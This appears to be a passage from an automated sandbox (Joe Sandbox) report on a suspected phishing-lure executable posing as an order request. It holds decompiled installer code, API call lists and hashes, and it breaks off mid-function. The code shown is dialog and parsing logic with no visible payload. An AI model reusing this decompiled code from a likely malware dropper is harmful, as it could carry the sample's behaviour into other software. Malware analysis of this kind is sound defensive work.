                                                              control_flow_graph 135 4052d0-4052eb 136 4052f1-4053b8 GetDlgItem * 3 call 40412b call 404a2e GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 40547a-405481 135->137 159 4053d6-4053d9 136->159 160 4053ba-4053d4 SendMessageW * 2 136->160 139 405483-4054a5 GetDlgItem CreateThread CloseHandle 137->139 140 4054ab-4054b8 137->140 139->140 142 4054d6-4054e0 140->142 143 4054ba-4054c0 140->143 144 4054e2-4054e8 142->144 145 405536-40553a 142->145 147 4054c2-4054d1 ShowWindow * 2 call 40412b 143->147 148 4054fb-405504 call 40415d 143->148 149 405510-405520 ShowWindow 144->149 150 4054ea-4054f6 call 4040cf 144->150 145->148 153 40553c-405542 145->153 147->142 156 405509-40550d 148->156 157 405530-405531 call 4040cf 149->157 158 405522-40552b call 405191 149->158 150->148 153->148 161 405544-405557 SendMessageW 153->161 157->145 158->157 164 4053e9-405400 call 4040f6 159->164 165 4053db-4053e7 SendMessageW 159->165 160->159 166 405659-40565b 161->166 167 40555d-405588 CreatePopupMenu call 406054 AppendMenuW 161->167 174 405402-405416 ShowWindow 164->174 175 405436-405457 GetDlgItem SendMessageW 164->175 165->164 166->156 172 40558a-40559a GetWindowRect 167->172 173 40559d-4055b2 TrackPopupMenu 167->173 172->173 173->166 176 4055b8-4055cf 173->176 177 405425 174->177 178 405418-405423 ShowWindow 174->178 175->166 179 40545d-405475 SendMessageW * 2 175->179 180 4055d4-4055ef SendMessageW 176->180 181 40542b-405431 call 40412b 177->181 178->181 179->166 180->180 182 4055f1-405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405616-40563d SendMessageW 182->184 184->184 185 40563f-405653 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->166
                                                              C-Code - Quality: 96%
                                                              			E004052D0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                              				struct HWND__* _v8;
                                                              				long _v12;
                                                              				struct tagRECT _v28;
                                                              				void* _v36;
                                                              				signed int _v40;
                                                              				int _v44;
                                                              				int _v48;
                                                              				signed int _v52;
                                                              				int _v56;
                                                              				void* _v60;
                                                              				void* _v68;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				struct HWND__* _t94;
                                                              				long _t95;
                                                              				int _t100;
                                                              				int _t101;
                                                              				long _t104;
                                                              				void* _t108;
                                                              				intOrPtr _t119;
                                                              				void* _t127;
                                                              				intOrPtr _t130;
                                                              				struct HWND__* _t134;
                                                              				int _t156;
                                                              				int _t159;
                                                              				struct HMENU__* _t164;
                                                              				struct HWND__* _t168;
                                                              				struct HWND__* _t169;
                                                              				int _t171;
                                                              				void* _t172;
                                                              				short* _t173;
                                                              				short* _t175;
                                                              				int _t177;
                                                              
                                                              				_t169 =  *0x7a7a24; // 0x10442
                                                              				_t156 = 0;
                                                              				_v8 = _t169;
                                                              				if(_a8 != 0x110) {
                                                              					__eflags = _a8 - 0x405;
                                                              					if(_a8 == 0x405) {
                                                              						_t127 = CreateThread(0, 0, E00405264, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                              						CloseHandle(_t127); // executed
                                                              					}
                                                              					__eflags = _a8 - 0x111;
                                                              					if(_a8 != 0x111) {
                                                              						L17:
                                                              						_t171 = 1;
                                                              						__eflags = _a8 - 0x404;
                                                              						if(_a8 != 0x404) {
                                                              							L25:
                                                              							__eflags = _a8 - 0x7b;
                                                              							if(_a8 != 0x7b) {
                                                              								goto L20;
                                                              							}
                                                              							_t94 = _v8;
                                                              							__eflags = _a12 - _t94;
                                                              							if(_a12 != _t94) {
                                                              								goto L20;
                                                              							}
                                                              							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                              							__eflags = _t95 - _t156;
                                                              							_a8 = _t95;
                                                              							if(_t95 <= _t156) {
                                                              								L36:
                                                              								return 0;
                                                              							}
                                                              							_t164 = CreatePopupMenu();
                                                              							AppendMenuW(_t164, _t156, _t171, E00406054(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                              							_t100 = _a16;
                                                              							__eflags = _a16 - 0xffffffff;
                                                              							_t159 = _a16 >> 0x10;
                                                              							if(_a16 == 0xffffffff) {
                                                              								GetWindowRect(_v8,  &_v28);
                                                              								_t100 = _v28.left;
                                                              								_t159 = _v28.top;
                                                              							}
                                                              							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                              							__eflags = _t101 - _t171;
                                                              							if(_t101 == _t171) {
                                                              								_v60 = _t156;
                                                              								_v48 = 0x7a1f40;
                                                              								_v44 = 0x1fff;
                                                              								_a4 = _a8;
                                                              								do {
                                                              									_a4 = _a4 - 1;
                                                              									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                              									__eflags = _a4 - _t156;
                                                              									_t171 = _t171 + _t104 + 2;
                                                              								} while (_a4 != _t156);
                                                              								OpenClipboard(_t156);
                                                              								EmptyClipboard();
                                                              								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                              								_a4 = _t108;
                                                              								_t172 = GlobalLock(_t108);
                                                              								do {
                                                              									_v48 = _t172;
                                                              									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                              									 *_t173 = 0xd;
                                                              									_t175 = _t173 + 2;
                                                              									 *_t175 = 0xa;
                                                              									_t172 = _t175 + 2;
                                                              									_t156 = _t156 + 1;
                                                              									__eflags = _t156 - _a8;
                                                              								} while (_t156 < _a8);
                                                              								GlobalUnlock(_a4);
                                                              								SetClipboardData(0xd, _a4);
                                                              								CloseClipboard();
                                                              							}
                                                              							goto L36;
                                                              						}
                                                              						__eflags =  *0x7a7a0c - _t156; // 0x0
                                                              						if(__eflags == 0) {
                                                              							ShowWindow( *0x7a8a48, 8);
                                                              							__eflags =  *0x7a8acc - _t156;
                                                              							if( *0x7a8acc == _t156) {
                                                              								_t119 =  *0x7a0f18; // 0x9ab874
                                                              								_t57 = _t119 + 0x34; // 0xffffffd5
                                                              								E00405191( *_t57, _t156);
                                                              							}
                                                              							E004040CF(_t171);
                                                              							goto L25;
                                                              						}
                                                              						 *0x7a0710 = 2;
                                                              						E004040CF(0x78);
                                                              						goto L20;
                                                              					} else {
                                                              						__eflags = _a12 - 0x403;
                                                              						if(_a12 != 0x403) {
                                                              							L20:
                                                              							return E0040415D(_a8, _a12, _a16);
                                                              						}
                                                              						ShowWindow( *0x7a7a10, _t156);
                                                              						ShowWindow(_t169, 8);
                                                              						E0040412B(_t169);
                                                              						goto L17;
                                                              					}
                                                              				}
                                                              				_v52 = _v52 | 0xffffffff;
                                                              				_v40 = _v40 | 0xffffffff;
                                                              				_t177 = 2;
                                                              				_v60 = _t177;
                                                              				_v56 = 0;
                                                              				_v48 = 0;
                                                              				_v44 = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				_t130 =  *0x7a8a50;
                                                              				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                              				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                              				 *0x7a7a10 = GetDlgItem(_a4, 0x403);
                                                              				 *0x7a7a08 = GetDlgItem(_a4, 0x3ee);
                                                              				_t134 = GetDlgItem(_a4, 0x3f8);
                                                              				 *0x7a7a24 = _t134;
                                                              				_v8 = _t134;
                                                              				E0040412B( *0x7a7a10);
                                                              				 *0x7a7a14 = E00404A2E(4);
                                                              				 *0x7a7a2c = 0;
                                                              				GetClientRect(_v8,  &_v28);
                                                              				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                              				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                              				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                              				if(_a8 >= 0) {
                                                              					SendMessageW(_v8, 0x1001, 0, _a8);
                                                              					SendMessageW(_v8, 0x1026, 0, _a8);
                                                              				}
                                                              				if(_a12 >= _t156) {
                                                              					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                              				}
                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                              				_push(0x1b);
                                                              				E004040F6(_a4);
                                                              				if(( *0x7a8a58 & 0x00000003) != 0) {
                                                              					ShowWindow( *0x7a7a10, _t156); // executed
                                                              					if(( *0x7a8a58 & 0x00000002) != 0) {
                                                              						 *0x7a7a10 = _t156;
                                                              					} else {
                                                              						ShowWindow(_v8, 8);
                                                              					}
                                                              					E0040412B( *0x7a7a08);
                                                              				}
                                                              				_t168 = GetDlgItem(_a4, 0x3ec);
                                                              				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                              				if(( *0x7a8a58 & 0x00000004) != 0) {
                                                              					SendMessageW(_t168, 0x409, _t156, _a12);
                                                              					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                              				}
                                                              				goto L36;
                                                              			}





































                                                              0x004052d8
                                                              0x004052de
                                                              0x004052e8
                                                              0x004052eb
                                                              0x0040547a
                                                              0x00405481
                                                              0x0040549e
                                                              0x004054a5
                                                              0x004054a5
                                                              0x004054ab
                                                              0x004054b8
                                                              0x004054d6
                                                              0x004054d8
                                                              0x004054d9
                                                              0x004054e0
                                                              0x00405536
                                                              0x00405536
                                                              0x0040553a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040553c
                                                              0x0040553f
                                                              0x00405542
                                                              0x00000000
                                                              0x00000000
                                                              0x0040554c
                                                              0x00405552
                                                              0x00405554
                                                              0x00405557
                                                              0x00405659
                                                              0x00000000
                                                              0x00405659
                                                              0x00405566
                                                              0x00405571
                                                              0x0040557a
                                                              0x00405581
                                                              0x00405585
                                                              0x00405588
                                                              0x00405591
                                                              0x00405597
                                                              0x0040559a
                                                              0x0040559a
                                                              0x004055aa
                                                              0x004055b0
                                                              0x004055b2
                                                              0x004055bb
                                                              0x004055be
                                                              0x004055c5
                                                              0x004055cc
                                                              0x004055d4
                                                              0x004055d4
                                                              0x004055e2
                                                              0x004055e8
                                                              0x004055eb
                                                              0x004055eb
                                                              0x004055f2
                                                              0x004055f8
                                                              0x00405604
                                                              0x0040560b
                                                              0x00405614
                                                              0x00405616
                                                              0x00405619
                                                              0x00405628
                                                              0x0040562b
                                                              0x00405631
                                                              0x00405632
                                                              0x00405638
                                                              0x00405639
                                                              0x0040563a
                                                              0x0040563a
                                                              0x00405642
                                                              0x0040564d
                                                              0x00405653
                                                              0x00405653
                                                              0x00000000
                                                              0x004055b2
                                                              0x004054e2
                                                              0x004054e8
                                                              0x00405518
                                                              0x0040551a
                                                              0x00405520
                                                              0x00405522
                                                              0x00405528
                                                              0x0040552b
                                                              0x0040552b
                                                              0x00405531
                                                              0x00000000
                                                              0x00405531
                                                              0x004054ec
                                                              0x004054f6
                                                              0x00000000
                                                              0x004054ba
                                                              0x004054ba
                                                              0x004054c0
                                                              0x004054fb
                                                              0x00000000
                                                              0x00405504
                                                              0x004054c9
                                                              0x004054ce
                                                              0x004054d1
                                                              0x00000000
                                                              0x004054d1
                                                              0x004054b8
                                                              0x004052f1
                                                              0x004052f5
                                                              0x004052fd
                                                              0x00405301
                                                              0x00405304
                                                              0x00405307
                                                              0x0040530a
                                                              0x0040530d
                                                              0x0040530e
                                                              0x0040530f
                                                              0x00405328
                                                              0x0040532b
                                                              0x00405335
                                                              0x00405344
                                                              0x0040534c
                                                              0x00405354
                                                              0x00405359
                                                              0x0040535c
                                                              0x00405368
                                                              0x00405371
                                                              0x0040537a
                                                              0x0040539c
                                                              0x004053a2
                                                              0x004053b3
                                                              0x004053b8
                                                              0x004053c6
                                                              0x004053d4
                                                              0x004053d4
                                                              0x004053d9
                                                              0x004053e7
                                                              0x004053e7
                                                              0x004053ec
                                                              0x004053ef
                                                              0x004053f4
                                                              0x00405400
                                                              0x00405409
                                                              0x00405416
                                                              0x00405425
                                                              0x00405418
                                                              0x0040541d
                                                              0x0040541d
                                                              0x00405431
                                                              0x00405431
                                                              0x00405445
                                                              0x0040544e
                                                              0x00405457
                                                              0x00405467
                                                              0x00405473
                                                              0x00405473
                                                              0x00000000

                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 0040532E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040533D
                                                              • GetClientRect.USER32(?,?), ref: 0040537A
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405381
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053A2
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B3
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C6
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D4
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E7
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405409
                                                              • ShowWindow.USER32(?,00000008), ref: 0040541D
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040543E
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040544E
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405467
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405473
                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040534C
                                                                • Part of subcall function 0040412B: SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405490
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005264,00000000), ref: 0040549E
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004054A5
                                                              • ShowWindow.USER32(00000000), ref: 004054C9
                                                              • ShowWindow.USER32(00010442,00000008), ref: 004054CE
                                                              • ShowWindow.USER32(00000008), ref: 00405518
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554C
                                                              • CreatePopupMenu.USER32 ref: 0040555D
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405571
                                                              • GetWindowRect.USER32(?,?), ref: 00405591
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AA
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E2
                                                              • OpenClipboard.USER32(00000000), ref: 004055F2
                                                              • EmptyClipboard.USER32 ref: 004055F8
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405604
                                                              • GlobalLock.KERNEL32(00000000), ref: 0040560E
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405622
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405642
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040564D
                                                              • CloseClipboard.USER32 ref: 00405653
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {
                                                              • API String ID: 590372296-366298937
                                                              • Opcode ID: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                              • Instruction ID: d666eaf08a066d9579ddfae71cfc5fc92f0d71f62ebd549160e6baeed9b36ff9
                                                              • Opcode Fuzzy Hash: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                              • Instruction Fuzzy Hash: A3B16A71900608FFDF11AF64DD89EAE3B79FB48355F00842AFA41BA1A0CB784A51DF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E10001B18() {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				WCHAR* _v24;
                                                              				WCHAR* _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				WCHAR* _v44;
                                                              				signed int _v48;
                                                              				void* _v52;
                                                              				intOrPtr _v56;
                                                              				WCHAR* _t199;
                                                              				signed int _t202;
                                                              				void* _t204;
                                                              				void* _t206;
                                                              				WCHAR* _t208;
                                                              				void* _t216;
                                                              				struct HINSTANCE__* _t217;
                                                              				struct HINSTANCE__* _t218;
                                                              				struct HINSTANCE__* _t220;
                                                              				signed short _t222;
                                                              				struct HINSTANCE__* _t225;
                                                              				struct HINSTANCE__* _t227;
                                                              				void* _t228;
                                                              				intOrPtr* _t229;
                                                              				void* _t240;
                                                              				signed char _t241;
                                                              				signed int _t242;
                                                              				void* _t246;
                                                              				struct HINSTANCE__* _t248;
                                                              				void* _t249;
                                                              				signed int _t251;
                                                              				short* _t253;
                                                              				signed int _t259;
                                                              				void* _t260;
                                                              				signed int _t263;
                                                              				signed int _t266;
                                                              				signed int _t267;
                                                              				signed int _t272;
                                                              				signed int _t273;
                                                              				signed int _t274;
                                                              				signed int _t275;
                                                              				void* _t278;
                                                              				void* _t282;
                                                              				struct HINSTANCE__* _t284;
                                                              				signed int _t287;
                                                              				void _t288;
                                                              				signed int _t289;
                                                              				signed int _t301;
                                                              				signed int _t302;
                                                              				signed short _t308;
                                                              				signed int _t309;
                                                              				WCHAR* _t310;
                                                              				WCHAR* _t312;
                                                              				WCHAR* _t313;
                                                              				struct HINSTANCE__* _t314;
                                                              				void* _t316;
                                                              				signed int _t318;
                                                              				void* _t319;
                                                              
                                                              				_t284 = 0;
                                                              				_v32 = 0;
                                                              				_v36 = 0;
                                                              				_v16 = 0;
                                                              				_v8 = 0;
                                                              				_v40 = 0;
                                                              				_t319 = 0;
                                                              				_v48 = 0;
                                                              				_t199 = E1000121B();
                                                              				_v24 = _t199;
                                                              				_v28 = _t199;
                                                              				_v44 = E1000121B();
                                                              				_t309 = E10001243();
                                                              				_v52 = _t309;
                                                              				_v12 = _t309;
                                                              				while(1) {
                                                              					_t202 = _v32;
                                                              					_v56 = _t202;
                                                              					if(_t202 != _t284 && _t319 == _t284) {
                                                              						break;
                                                              					}
                                                              					_t308 =  *_t309;
                                                              					_t287 = _t308 & 0x0000ffff;
                                                              					_t204 = _t287 - _t284;
                                                              					if(_t204 == 0) {
                                                              						_t33 =  &_v32;
                                                              						 *_t33 = _v32 | 0xffffffff;
                                                              						__eflags =  *_t33;
                                                              						L17:
                                                              						_t206 = _v56 - _t284;
                                                              						if(_t206 == 0) {
                                                              							__eflags = _t319 - _t284;
                                                              							 *_v28 = _t284;
                                                              							if(_t319 == _t284) {
                                                              								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                              								_t319 = _t246;
                                                              								 *(_t319 + 0x1010) = _t284;
                                                              								 *(_t319 + 0x1014) = _t284;
                                                              							}
                                                              							_t288 = _v36;
                                                              							_t43 = _t319 + 8; // 0x8
                                                              							_t208 = _t43;
                                                              							_t44 = _t319 + 0x808; // 0x808
                                                              							_t310 = _t44;
                                                              							 *_t319 = _t288;
                                                              							_t289 = _t288 - _t284;
                                                              							__eflags = _t289;
                                                              							 *_t208 = _t284;
                                                              							 *_t310 = _t284;
                                                              							 *(_t319 + 0x1008) = _t284;
                                                              							 *(_t319 + 0x100c) = _t284;
                                                              							 *(_t319 + 4) = _t284;
                                                              							if(_t289 == 0) {
                                                              								__eflags = _v28 - _v24;
                                                              								if(_v28 == _v24) {
                                                              									goto L39;
                                                              								}
                                                              								_t316 = 0;
                                                              								GlobalFree(_t319);
                                                              								_t319 = E10001311(_v24);
                                                              								__eflags = _t319 - _t284;
                                                              								if(_t319 == _t284) {
                                                              									goto L39;
                                                              								} else {
                                                              									goto L32;
                                                              								}
                                                              								while(1) {
                                                              									L32:
                                                              									_t240 =  *(_t319 + 0x1ca0);
                                                              									__eflags = _t240 - _t284;
                                                              									if(_t240 == _t284) {
                                                              										break;
                                                              									}
                                                              									_t316 = _t319;
                                                              									_t319 = _t240;
                                                              									__eflags = _t319 - _t284;
                                                              									if(_t319 != _t284) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								__eflags = _t316 - _t284;
                                                              								if(_t316 != _t284) {
                                                              									 *(_t316 + 0x1ca0) = _t284;
                                                              								}
                                                              								_t241 =  *(_t319 + 0x1010);
                                                              								__eflags = _t241 & 0x00000008;
                                                              								if((_t241 & 0x00000008) == 0) {
                                                              									_t242 = _t241 | 0x00000002;
                                                              									__eflags = _t242;
                                                              									 *(_t319 + 0x1010) = _t242;
                                                              								} else {
                                                              									_t319 = E1000158F(_t319);
                                                              									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                              								}
                                                              								goto L39;
                                                              							} else {
                                                              								_t301 = _t289 - 1;
                                                              								__eflags = _t301;
                                                              								if(_t301 == 0) {
                                                              									L28:
                                                              									lstrcpyW(_t208, _v44);
                                                              									L29:
                                                              									lstrcpyW(_t310, _v24);
                                                              									L39:
                                                              									_v12 = _v12 + 2;
                                                              									_v28 = _v24;
                                                              									L63:
                                                              									if(_v32 != 0xffffffff) {
                                                              										_t309 = _v12;
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								_t302 = _t301 - 1;
                                                              								__eflags = _t302;
                                                              								if(_t302 == 0) {
                                                              									goto L29;
                                                              								}
                                                              								__eflags = _t302 != 1;
                                                              								if(_t302 != 1) {
                                                              									goto L39;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              						}
                                                              						if(_t206 != 1) {
                                                              							goto L39;
                                                              						}
                                                              						_t248 = _v16;
                                                              						if(_v40 == _t284) {
                                                              							_t248 = _t248 - 1;
                                                              						}
                                                              						 *(_t319 + 0x1014) = _t248;
                                                              						goto L39;
                                                              					}
                                                              					_t249 = _t204 - 0x23;
                                                              					if(_t249 == 0) {
                                                              						__eflags = _t309 - _v52;
                                                              						if(_t309 <= _v52) {
                                                              							L15:
                                                              							_v32 = _t284;
                                                              							_v36 = _t284;
                                                              							goto L17;
                                                              						}
                                                              						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                              						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                              							goto L15;
                                                              						}
                                                              						__eflags = _v32 - _t284;
                                                              						if(_v32 == _t284) {
                                                              							L40:
                                                              							_t251 = _v32 - _t284;
                                                              							__eflags = _t251;
                                                              							if(_t251 == 0) {
                                                              								__eflags = _t287 - 0x2a;
                                                              								if(_t287 == 0x2a) {
                                                              									_v36 = 2;
                                                              									L61:
                                                              									_t309 = _v12;
                                                              									_v28 = _v24;
                                                              									_t284 = 0;
                                                              									__eflags = 0;
                                                              									L62:
                                                              									_t318 = _t309 + 2;
                                                              									__eflags = _t318;
                                                              									_v12 = _t318;
                                                              									goto L63;
                                                              								}
                                                              								__eflags = _t287 - 0x2d;
                                                              								if(_t287 == 0x2d) {
                                                              									L131:
                                                              									__eflags = _t308 - 0x2d;
                                                              									if(_t308 != 0x2d) {
                                                              										L134:
                                                              										_t253 = _t309 + 2;
                                                              										__eflags =  *_t253 - 0x3a;
                                                              										if( *_t253 != 0x3a) {
                                                              											L141:
                                                              											_v28 =  &(_v28[0]);
                                                              											 *_v28 = _t308;
                                                              											goto L62;
                                                              										}
                                                              										__eflags = _t308 - 0x2d;
                                                              										if(_t308 == 0x2d) {
                                                              											goto L141;
                                                              										}
                                                              										_v36 = 1;
                                                              										L137:
                                                              										_v12 = _t253;
                                                              										__eflags = _v28 - _v24;
                                                              										if(_v28 <= _v24) {
                                                              											 *_v44 = _t284;
                                                              										} else {
                                                              											 *_v28 = _t284;
                                                              											lstrcpyW(_v44, _v24);
                                                              										}
                                                              										goto L61;
                                                              									}
                                                              									_t253 = _t309 + 2;
                                                              									__eflags =  *_t253 - 0x3e;
                                                              									if( *_t253 != 0x3e) {
                                                              										goto L134;
                                                              									}
                                                              									_v36 = 3;
                                                              									goto L137;
                                                              								}
                                                              								__eflags = _t287 - 0x3a;
                                                              								if(_t287 != 0x3a) {
                                                              									goto L141;
                                                              								}
                                                              								goto L131;
                                                              							}
                                                              							_t259 = _t251 - 1;
                                                              							__eflags = _t259;
                                                              							if(_t259 == 0) {
                                                              								L74:
                                                              								_t260 = _t287 - 0x22;
                                                              								__eflags = _t260 - 0x55;
                                                              								if(_t260 > 0x55) {
                                                              									goto L61;
                                                              								}
                                                              								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                              									case 0:
                                                              										__ecx = _v24;
                                                              										__edi = _v12;
                                                              										while(1) {
                                                              											__edi = __edi + 1;
                                                              											__edi = __edi + 1;
                                                              											_v12 = __edi;
                                                              											__ax =  *__edi;
                                                              											__eflags = __ax - __dx;
                                                              											if(__ax != __dx) {
                                                              												goto L116;
                                                              											}
                                                              											L115:
                                                              											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                              											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                              												L120:
                                                              												 *__ecx =  *__ecx & 0x00000000;
                                                              												__ebx = E1000122C(_v24);
                                                              												goto L91;
                                                              											}
                                                              											L116:
                                                              											__eflags = __ax;
                                                              											if(__ax == 0) {
                                                              												goto L120;
                                                              											}
                                                              											__eflags = __ax - __dx;
                                                              											if(__ax == __dx) {
                                                              												__edi = __edi + 1;
                                                              												__edi = __edi + 1;
                                                              												__eflags = __edi;
                                                              											}
                                                              											__ax =  *__edi;
                                                              											 *__ecx =  *__edi;
                                                              											__ecx = __ecx + 1;
                                                              											__ecx = __ecx + 1;
                                                              											__edi = __edi + 1;
                                                              											__edi = __edi + 1;
                                                              											_v12 = __edi;
                                                              											__ax =  *__edi;
                                                              											__eflags = __ax - __dx;
                                                              											if(__ax != __dx) {
                                                              												goto L116;
                                                              											}
                                                              											goto L115;
                                                              										}
                                                              									case 1:
                                                              										_v8 = 1;
                                                              										goto L61;
                                                              									case 2:
                                                              										_v8 = _v8 | 0xffffffff;
                                                              										goto L61;
                                                              									case 3:
                                                              										_v8 = _v8 & 0x00000000;
                                                              										_v20 = _v20 & 0x00000000;
                                                              										_v16 = _v16 + 1;
                                                              										goto L79;
                                                              									case 4:
                                                              										__eflags = _v20;
                                                              										if(_v20 != 0) {
                                                              											goto L61;
                                                              										}
                                                              										_v12 = _v12 - 2;
                                                              										__ebx = E1000121B();
                                                              										 &_v12 = E10001A9F( &_v12);
                                                              										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                              										goto L91;
                                                              									case 5:
                                                              										L99:
                                                              										_v20 = _v20 + 1;
                                                              										goto L61;
                                                              									case 6:
                                                              										_push(7);
                                                              										goto L107;
                                                              									case 7:
                                                              										_push(0x19);
                                                              										goto L127;
                                                              									case 8:
                                                              										_push(0x15);
                                                              										goto L127;
                                                              									case 9:
                                                              										_push(0x16);
                                                              										goto L127;
                                                              									case 0xa:
                                                              										_push(0x18);
                                                              										goto L127;
                                                              									case 0xb:
                                                              										_push(5);
                                                              										goto L107;
                                                              									case 0xc:
                                                              										__eax = 0;
                                                              										__eax = 1;
                                                              										goto L85;
                                                              									case 0xd:
                                                              										_push(6);
                                                              										goto L107;
                                                              									case 0xe:
                                                              										_push(2);
                                                              										goto L107;
                                                              									case 0xf:
                                                              										_push(3);
                                                              										goto L107;
                                                              									case 0x10:
                                                              										_push(0x17);
                                                              										L127:
                                                              										_pop(__ebx);
                                                              										goto L92;
                                                              									case 0x11:
                                                              										__eax =  &_v12;
                                                              										__eax = E10001A9F( &_v12);
                                                              										__ebx = __eax;
                                                              										__ebx = __eax + 1;
                                                              										__eflags = __ebx - 0xb;
                                                              										if(__ebx < 0xb) {
                                                              											__ebx = __ebx + 0xa;
                                                              										}
                                                              										goto L91;
                                                              									case 0x12:
                                                              										__ebx = 0xffffffff;
                                                              										goto L92;
                                                              									case 0x13:
                                                              										_v48 = _v48 + 1;
                                                              										_push(4);
                                                              										_pop(__eax);
                                                              										goto L85;
                                                              									case 0x14:
                                                              										__eax = 0;
                                                              										__eflags = 0;
                                                              										goto L85;
                                                              									case 0x15:
                                                              										_push(4);
                                                              										L107:
                                                              										_pop(__eax);
                                                              										L85:
                                                              										__edi = _v16;
